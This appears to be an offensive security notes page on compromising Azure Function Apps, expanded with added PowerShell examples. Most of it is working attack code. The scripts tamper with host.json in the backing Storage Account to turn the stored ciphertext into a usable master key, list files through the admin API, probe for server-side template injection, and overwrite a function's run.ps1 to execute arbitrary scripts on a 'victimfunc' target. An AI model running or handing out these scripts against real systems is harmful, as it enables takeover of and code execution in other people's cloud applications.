Function App
1.0 Master Key Abuse
The Function App's master key is stored in host.json inside the Function App's backing Storage Account (the azure-webjobs-secrets container). Read or write access to that Storage Account therefore yields the master key, and the master key gives full administrative access to the Function App (admin API, file system, every trigger).
1.1 Pseudo-Decrypt Master Key
With write permission to host.json you can manipulate the master key. If the key is stored with "encrypted": true, change it to "encrypted": false: the runtime then treats the stored (encrypted) value as plain text, so the ciphertext string itself becomes a working master key. If the new key is rejected at first, the host may still be caching the old secrets; restarting the Function App forces a reload.
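The procedure end to end, as an added example that is not part of the original page: download host.json from the Storage Account, flip the encrypted flag, upload it again, and use the stored value as the master key. It assumes the Az.Storage module, a storage account connection string obtained elsewhere, the default secrets location azure-webjobs-secrets/<app-name>/host.json, and the /admin/functions admin endpoint (the field name invoke_url_template is assumed).

```powershell
# Added example, not from the original page. Assumes: Az.Storage module, a storage
# account connection string already in hand, and the default secrets blob path
# azure-webjobs-secrets/<function-app-name>/host.json.
param(
    [Parameter(Mandatory)] [string] $FunctionApp,       # e.g. "victimfunc" for victimfunc.azurewebsites.net
    [Parameter(Mandatory)] [string] $ConnectionString   # storage account connection string
)

$container = "azure-webjobs-secrets"
$blob      = "$FunctionApp/host.json"
$local     = Join-Path $env:TEMP "host.json"

$ctx = New-AzStorageContext -ConnectionString $ConnectionString

# 1. Pull the current secrets file
Get-AzStorageBlobContent -Container $container -Blob $blob -Context $ctx -Destination $local -Force | Out-Null
$secrets = Get-Content -Path $local -Raw | ConvertFrom-Json

# 2. Mark the master key as unencrypted; the runtime will now use the stored string as-is
$masterKey = $secrets.masterKey.value
$secrets.masterKey.encrypted = $false
$secrets | ConvertTo-Json -Depth 10 | Set-Content -Path $local -Encoding utf8

# 3. Push the modified file back
Set-AzStorageBlobContent -File $local -Container $container -Blob $blob -Context $ctx -Force | Out-Null

# 4. Prove it worked: the admin API only answers to the master key.
#    If this returns 401, the host may still cache the old secrets; restart the app and retry.
$listing = Invoke-RestMethod -UseBasicParsing -Method Get `
    -Uri "https://$FunctionApp.azurewebsites.net/admin/functions" `
    -Headers @{ "x-functions-key" = $masterKey }

# invoke_url_template is the assumed field name holding each trigger's URL
$listing | Select-Object name, invoke_url_template
```

Keep a copy of the original host.json before step 3; restoring the original encrypted entry afterwards is the only way to put the target back into its previous state.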
```json
{
  "masterKey": {
    "name": "master",
    "value": "f30gh034jgj5hjwmfpokg90ßi90klüogew4ütlgbh045kß095zhk95",
    "encrypted": false
  },
  ...
}
```

The stored value is now accepted as the master key. Send it in the x-functions-key header against the admin API, for example to list the wwwroot directory through the VFS endpoint (each function is a folder containing run.ps1 and function.json):

```powershell
# $functionBase is the Function App name, e.g. "victimfunc" for victimfunc.azurewebsites.net
$functionBase = "<FUNCTION_APP_NAME>"
$url = "https://$functionBase.azurewebsites.net/admin/vfs/site/wwwroot"
$Params = @{
    "URI"     = $url
    "Method"  = "GET"
    "Headers" = @{
        "Content-Type"    = "application/octet-stream"
        "x-functions-key" = "f30gh034jgj5hjwmfpokg90ßi90klüogew4ütlgbh045kß095zhk95"  # value taken from host.json
    }
}
Invoke-RestMethod @Params -UseBasicParsing
```

2.0 Exploiting
2.1 Server Side Template Injection (SSTI)
If the function renders its response with a template engine and user input reaches the template, SSTI may be possible. You need to be able to call the trigger function (a function key, the master key, or an anonymous trigger).
```
# The output will contain 16 if the expression is evaluated
https://$functionBase.azurewebsites.net/api/Process?name=python&email={{2*8}}
```

A collection of injection techniques for different template engines is available here.
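A probe that goes beyond the single Jinja-style payload above, as an added example that is not part of the original page: it sends an arithmetic expression in the syntax of several template-engine families and reports whether the product appears in the response (evaluated) or the payload is echoed back unchanged (reflected but not evaluated). It assumes the route and parameter names shown on the page (api/Process, name, email) and a function or master key; the Function App name is a placeholder.

```powershell
# Added example, not from the original page. Assumes the trigger route and parameter
# names from the page; $FunctionApp and $Key are placeholders.
function Test-FunctionSsti {
    param(
        [Parameter(Mandatory)] [string] $FunctionApp,
        [string] $Route = "api/Process",       # assumed trigger route
        [string] $Param = "email",             # parameter reflected into the template
        [string] $Key   = "<FUNCTION_KEY>"     # function or master key
    )

    # Each payload multiplies 7 by 191; 1337 is unlikely to appear in a normal
    # response, so seeing it in the body means the expression was evaluated.
    $payloads = @(
        @{ Engine = "Jinja2/Twig/Nunjucks"; Payload = "{{7*191}}" }
        @{ Engine = "Freemarker/Velocity";  Payload = '${7*191}' }
        @{ Engine = "Mako/ERB";             Payload = "<%= 7*191 %>" }
        @{ Engine = "Smarty";               Payload = "{7*191}" }
        @{ Engine = "Thymeleaf/Pebble";     Payload = "#{7*191}" }
    )

    foreach ($p in $payloads) {
        # Braces, %, < and # must be percent-encoded or the URL is mangled
        $encoded = [uri]::EscapeDataString($p.Payload)
        $uri = "https://$FunctionApp.azurewebsites.net/${Route}?name=python&$Param=$encoded"
        try {
            $resp = Invoke-WebRequest -UseBasicParsing -Uri $uri -Headers @{ "x-functions-key" = $Key }
            $body = $resp.Content
        } catch {
            # A 500 from a template parse error is itself a hint; keep the message for the report
            $body = $_.Exception.Message
        }
        $evaluated = $body -match [regex]::Escape("1337")
        $reflected = $body -match [regex]::Escape($p.Payload)
        [pscustomobject]@{
            Engine    = $p.Engine
            Payload   = $p.Payload
            Evaluated = $evaluated
            Reflected = ($reflected -and -not $evaluated)
        }
    }
}

# Usage (placeholders): Test-FunctionSsti -FunctionApp "victimfunc" -Key "<MASTER_KEY>" | Format-Table
```

A row with Evaluated = True identifies the engine family to target with the collection of payloads referenced above; a row with Reflected = True but Evaluated = False means the parameter reaches the output but the template is not rendering it, which usually points to output encoding or a different injection class (XSS) rather than SSTI.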
2.2 File Upload
There are different ways to upload files:
- Weak upload scripts without validation
- Write permission on the Storage Account backing the Function App
- A PUT request against the admin VFS API, authenticated with the master key, which writes a file directly into the function's directory:
```powershell
$functionBase = "<FUNCTION_APP_NAME>"
$url = "https://$($functionBase).azurewebsites.net/admin/vfs/site/wwwroot/HttpTrigger/run.ps1"

# Contents of the new run.ps1. The backticks stop the outer here-string from
# expanding the inner variables and from terminating at the inner "@ line.
# "using namespace System.Net" is needed for [HttpStatusCode] to resolve.
$body = @"
using namespace System.Net

`$data = `$Env:COMPUTERNAME
`$result = @"
Computername:
`$data
`"@
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = `$result
})
"@

$Params = @{
    "URI"     = $url
    "Headers" = @{
        "Content-Type"    = "application/octet-stream"
        "x-functions-key" = "<MASTER_KEY>"
        "If-Match"        = "*"   # the VFS endpoint requires this when overwriting an existing file
    }
    "Body"    = $body
}
Invoke-RestMethod @Params -UseBasicParsing -Method Put
```

The request above overwrites run.ps1 of the HttpTrigger function with a script that returns the computer name in the HTTP response. Calling the trigger afterwards (the master key is also accepted as the ?code= value) displays it.
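The write-then-trigger loop as a reusable routine, as an added example that is not part of the original page: it backs up the target run.ps1 through the VFS API, overwrites it with an arbitrary script, calls the trigger to collect the output, and restores the original. It assumes the master key, the /admin/functions/<name> admin endpoint with an invoke_url_template field (assumed name), and that the master key is accepted as the key for any HTTP trigger; the Function App and function names are placeholders, and the payload script is constructed here for illustration.

```powershell
# Added example, not from the original page. Assumes the master key and the
# /admin/functions/<name> endpoint; invoke_url_template is an assumed field name.
function Invoke-FunctionOverwrite {
    param(
        [Parameter(Mandatory)] [string] $FunctionApp,    # placeholder, e.g. "victimfunc"
        [Parameter(Mandatory)] [string] $MasterKey,
        [Parameter(Mandatory)] [string] $FunctionName,   # e.g. "HttpTrigger"
        [Parameter(Mandatory)] [string] $Script          # new contents of run.ps1
    )
    $base    = "https://$FunctionApp.azurewebsites.net"
    $headers = @{ "x-functions-key" = $MasterKey }
    # If-Match is required by the VFS endpoint when the file already exists
    $putHeaders = $headers + @{ "Content-Type" = "application/octet-stream"; "If-Match" = "*" }
    $vfs = "$base/admin/vfs/site/wwwroot/$FunctionName/run.ps1"

    # 1. Keep a copy of the original so the target can be restored
    $original = Invoke-RestMethod -UseBasicParsing -Uri $vfs -Headers $headers

    # 2. Overwrite run.ps1 with the payload
    Invoke-RestMethod -UseBasicParsing -Method Put -Uri $vfs -Body $Script -Headers $putHeaders | Out-Null

    # 3. Look up the trigger URL and call it; the master key authorises any authLevel
    $fn  = Invoke-RestMethod -UseBasicParsing -Uri "$base/admin/functions/$FunctionName" -Headers $headers
    $out = Invoke-RestMethod -UseBasicParsing -Uri $fn.invoke_url_template -Headers $headers

    # 4. Put the original script back
    Invoke-RestMethod -UseBasicParsing -Method Put -Uri $vfs -Body $original -Headers $putHeaders | Out-Null
    return $out
}

# Constructed payload: reports the identity and host the function runs as. A literal
# here-string (@' ... '@) is used so nothing inside needs backtick escaping.
$payload = @'
using namespace System.Net
param($Request)
$info = @{
    User     = [Environment]::UserName
    Host     = $env:COMPUTERNAME
    EnvCount = (Get-ChildItem env:).Count
}
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = ($info | ConvertTo-Json)
})
'@

Invoke-FunctionOverwrite -FunctionApp "victimfunc" -MasterKey "<MASTER_KEY>" -FunctionName "HttpTrigger" -Script $payload
```

Restoring the original file matters beyond tidiness: the overwritten run.ps1 is live for every caller of that trigger, so leaving a payload in place changes the behaviour of production traffic for as long as it stays there.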